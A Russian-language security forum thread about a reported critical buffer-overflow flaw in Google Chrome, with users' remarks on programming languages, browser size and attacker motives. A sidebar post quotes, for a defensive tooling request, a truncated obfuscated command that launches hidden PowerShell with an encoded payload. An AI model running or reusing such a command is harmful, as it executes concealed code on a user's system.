Перейти к содержанию
AM_Bot

В Google Chrome обнаружена еще одна критически опасная уязвимость

Recommended Posts

AM_Bot

Вьетнамская ИТ-компания Bach Khoa Internet Security в текущей версии браузера Google Chrome обнаружила критически опасную уязвимость, связанную с переполнением буфера обмена системы.читать дальше

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Deja_Vu

Перестали бы писать на C++ и перешли бы на delphi, или на другие языки с жестким определением типов, и не было бы этих переполнений >_>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alisa_sh

на первый взгляд, Chrome - просто багливое корыто:

http://securityvulns.ru/news/Google/Chrome/0904.html

Однако если бы я была Гуглом, то рассуждала бы примерно так: зачем тратить собственные ресурсы на вылавливание мелких багов, если в первую же неделю после релиза за нас это сделают хакеры всего мира? главное - сфокусировать усилия на инновационной архитектуре.

Некоторые секьюрити-специалисты поддерживают Chrome вопреки его сырости и уязвимости:

http://sunbeltblog.blogspot.com/2008/09/ch...hat-others.html

В общем, данные противоречивые с большой амплитудой - что также стимулирует потратить немного времени и посмотреть-поковырять этот продукт.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
Перестали бы писать на C++ и перешли бы на delphi, или на другие языки с жестким определением типов, и не было бы этих переполнений >_>

И будет не браузер, а монстр метров 20 :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Valery Ledovskoy
И будет не браузер, а монстр метров 20 smile.gif

Сейчас он уже в 7ZIP 22Мб, если правильно помню.

В распакованном виде - около 60.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Нет слов...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

А стоит ли хакерам заморачиваться сейчас с поиском уязвимостей в Chrome, если его доля на рынке, а следовательно и количество потенциальных жертв сейчас слишком мала? Лучше придержать все вкусное на потом, когда продукт наберет вес, потеснив FF и IE.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

А Fx не так начинал, разве?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dr_dizel
...связанную с переполнением буфера обмена системы...
:blink:

связанную с переполнением буфера или затиранием стека, но не "буфера обмена"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×